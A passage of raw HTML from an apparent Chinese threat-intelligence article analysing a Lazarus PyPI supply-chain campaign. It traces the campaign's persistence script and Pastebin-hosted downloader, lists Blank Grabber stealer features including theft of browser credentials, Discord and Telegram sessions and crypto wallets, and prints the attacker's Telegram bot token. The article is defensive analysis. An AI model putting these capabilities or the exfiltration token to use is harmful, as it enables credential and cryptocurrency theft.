YaHei&#34;, Arial, sans-serif;"><span leaf="">具体做法是从Python官网下载Python 3.11安装包，Startup目录下写入Windows Update Script.pyw形成持久化。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023985" class="rich_pages wxw-img" data-ratio="0.24046242774566473" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b82d00c4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKHmyNt8G1555qcrhiaMict3uEWsHnU0kmuV8LERyGxwGYibjJwFHicET8Aw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Windows Update Script.pyw会继续创建计划任务，并解密url列表从Pastebin下载Tsunami-Installer。解密方式采用hex+xor+base64解码+反序的方式，如下图所示：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023986" class="rich_pages wxw-img" data-ratio="0.6279761904761905" data-type="png" data-w="672" src="https://wechat2rss.xlab.app/img-proxy/?k=cf2df87c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqK2bWicoxe0KcnBDuy9edMYoIumticMw1h3HbP8APOP6q1u4hiamCDiacT8A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Tsunami-Installer后续会下发多个加密货币挖矿程序和凭证窃取程序。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">第二部分的Python代码是一个开源的信息窃取木马（Stealer），项目名称为“Blank Grabber”，项目地址为<a href="https://github.com/Blank-c/Blank-Grabber。Blank" target="_blank">https://github.com/Blank-c/Blank-Grabber。Blank</a> Grabber的通信模式支持Discord和Telegram两种方式，在配置Setting里进行定义，同时配置里面还定义了哪些功能的开启，如下图所示。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023987" class="rich_pages wxw-img" data-ratio="0.6097883597883598" data-type="png" data-w="756" src="https://wechat2rss.xlab.app/img-proxy/?k=ab4920c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKGnuWmUQhBYLiaYs5pggjcGalCQSI7z9OBa7T7oGNXp2rQEjehYepNnw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">根据配置可知本次使用Telegram进行通信，其Bot Token和ChatID为：7400917372:AAHuzyKxmWHc4L7jUOENK0BGNB0k1pI65lE$783432595。其执行时隐藏窗口，接着创建互斥体“il9MGMxYXWAeXxAm”，然后开启窃密行动。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">首先窃取浏览器密码+Cookies+自动填充+历史记录数据，主要包括基于Chromium内核的浏览器如：Chrome、Brave、Opera、Microsoft Edge、Yandex Browser等。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023988" class="rich_pages wxw-img" data-ratio="0.4208092485549133" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=3613b1a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKKl85EJ9I1ZJaWUApxicPVURibklZRhyDmjVOwN3Oa7N0WEa0V6krzesQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">窃取Telegram会话数据。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023989" class="rich_pages wxw-img" data-ratio="0.6173410404624278" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=501cb314&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqK8biceZWXR0lGWFvy0zOX0yg76eLGhFIfvg667ZnTtBAdACwYr8Wohrw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">窃取DiscordToken数据，支持所有 Chromium 浏览器，还特别增加了Firefox浏览器的适配，获取数据包括完整Token、邮箱、手机号、付款方式、Nitro状态等。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023990" class="rich_pages wxw-img" data-ratio="0.6138728323699422" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=c4121a78&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqK9DbkKkVrBsbrsDPYsaJvRXdf4suexbdIfhySuc4ckrwY68RgXUBR3g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着窃取钱包，涵盖Zcash、Armory、Bytecoin、Jaxx、Exodus、Ethereum、Electrum 、Atomic Wallet、Guarda、Coinomi、MetaMask、Phantom、TronLink、Binance Wallet等20多种主流钱包。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023991" class="rich_pages wxw-img" data-ratio="0.6104046242774567" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=8d34ad78&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKffmJ2Lib00f4dtXIlJ1x9yicrZDicOJKU1BpelJnVx2AJr6CjXWDEwf8A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Blank Grabber木马的功能较齐全，不再一一叙述，其完整功能及本次木马开启的功能如下表所示：</span></span></p></div></div><table style="width:575px;"><tbody><tr><td data-colwidth="192"><p style="text-align: center;"><span leaf="">功能</span></p></td><td data-colwidth="317"><p style="text-align: center;"><span leaf="">功能描述</span></p></td><td data-colwidth="66"><p style="text-align: center;"><span leaf="">是否开启</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">PingMe</span></span></p></td><td data-colwidth="317"><p><span leaf="">发送消息时@everyone提醒攻击者</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Vmprotect</span></span></p></td><td data-colwidth="317"><p><span leaf="">反虚拟机/反沙箱</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Startup</span></span></p></td><td data-colwidth="317"><p><span leaf="">开机自启动（复制到StartUp文件夹）</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Melt</span></span></p></td><td data-colwidth="317"><p><span leaf="">运行完毕后自删除</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">UacBypass</span></span></p></td><td data-colwidth="317"><p><span leaf="">UAC提权绕过</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">ArchivePassword</span></span></p></td><td data-colwidth="317"><p><span leaf="">设置ZIP/RAR 压缩包密码（当前为 1）</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">HideConsole</span></span></p></td><td data-colwidth="317"><p><span leaf="">隐藏黑色控制台窗口</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Debug</span></span></p></td><td data-colwidth="317"><p><span leaf="">输出调试日志</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">RunBoundOnStartup</span></span></p></td><td data-colwidth="317"><p><span leaf="">释放并运行资源中绑定的额外文件</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureWebcam</span></span></p></td><td data-colwidth="317"><p><span leaf="">摄像头捕获</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CapturePasswords</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取浏览器保存的账号密码</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureCookies</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取浏览器的Cookies（含登录态）</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureAutofills</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取浏览器自动填充（姓名、电话、地址、身份证等）</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureHistory</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取浏览器历史记录</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureDiscordTokens</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取所有Discord Token（含邮箱、付款方式、Nitro）</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureGames</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取Minecraft、Steam、Epic、Growtopia等游戏会话</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureWifiPasswords</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取已连接过的所有WiFi密码</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureSystemInfo</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取系统信息、硬件信息、IP归属等</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureScreenshot</span></span></p></td><td data-colwidth="317"><p><span leaf="">多显示器全屏截图</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureTelegram</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取Telegram会话数据</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureCommonFiles</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取文件</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CaptureWallets</span></span></p></td><td data-colwidth="317"><p><span leaf="">窃取 MetaMask、Exodus、Electrum等20+加密钱包种子/私钥</span></p></td><td data-colwidth="66"><p><span leaf="">是</span></p></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">FakeError</span></span></p></td><td data-colwidth="317"><p><span leaf="">运行时弹出假错误弹窗迷惑用户</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">BlockAvSites</span></span></p></td><td data-colwidth="317"><p><span leaf="">修改hosts屏蔽杀毒软件官网</span></p></td><td data-colwidth="66"></td></tr><tr><td data-colwidth="192"><p><span leaf=""><span textstyle="" style="font-size: 15px;">DiscordInjection</span></span></p></td><td data-colwidth="317"><p><span leaf="">向Discord客户端注入JS后门</span></p></td><td data-colwidth="66"></td></tr></tbody></table><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">从上分析可知，Lazarus组织利用Blank Grabber木马精准开启了“浏览器全家桶 + Telegram + Discord + 加密钱包”四大最值钱功能，目的很纯粹，旨在系统性收集受害者的凭证与资产信息，为后续账户接管、资金转移和供应链渗透创造条件。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 三、归属研判 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">通过对本次攻击活动的深入分析，发现攻击方式与Lazarus组织技术特征较为符合，具体总结如下：</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">1．本次样本使用的解混淆方式：多轮反序+base64解码+zlib解压缩和Lazarus组织之前攻击方式相同。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">2．本次样本释放的Tsunami Injector和安全研究机构 HiSolutions对Lazarus Tsunami框架的详细分析报告[1]基本一致，具体到文件名，函数名及解压密码“!!!HappyPenguin1950!!!”等都与报告相同。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">3．本次攻击也是针对加密货币领域，诱饵名“Pharos.rar”伪装成“Pharos-Automation-Bot”（一个在加密货币量化交易圈广为人知的自动化交易机器人项目），精准迎合了目标人群（加密货币玩家、量化开发者与DeFi从业者），符合Lazarus组织持续针对加密货币领域特点。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">综上，将本次攻击活动归属到</span><span leaf="">APT-C-26（Lazarus）</span><span leaf="">组织。</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="3 11 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer"><div data-tools="135编辑器" data-id="101849"><div style="margin-top: 10px;margin-bottom: 10px;"><div style="margin-bottom: -15px;display: flex;transform: rotate(0deg);"><p data-brushtype="text" style="padding-right: 1em;padding-left: 1em;color: rgb(242, 242, 242);line-height: 32px;height: 32px;font-size: 16px;background-color: rgb(190, 25, 31);letter-spacing: 1.5px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 17px;"><span leaf="">总结</span></span></strong></span></p></div><div style="margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;"><div data-autoskip="1" style="line-height: 1.75em;letter-spacing: 1.5px;font-size: 14px;"><p style="text-indent: 2em;"><span style="color: rgb(51, 51, 51);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;color: rgb(51, 51, 51);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(242, 242, 242);"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">APT-C-26（Lazarus）组织利用PyPI供应链投毒攻击已造成多起金额高达数百万美元的加密货币盗窃事件。该组织通过不断迭代跨平台投毒技术和结合最新漏洞实现快速武器化，显示出其对加密货币领域的高度关注和持续投入。建议所有使用Python开发环境以及处理外部RAR文件的用户及企业立即升级WinRAR至最新版本、严格审查PyPI软件包来源可靠性，并部署针对性检测规则，以有效防范该组织的供应链攻击和后续加密资产窃取行为。</span></span></span></span></p></div></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 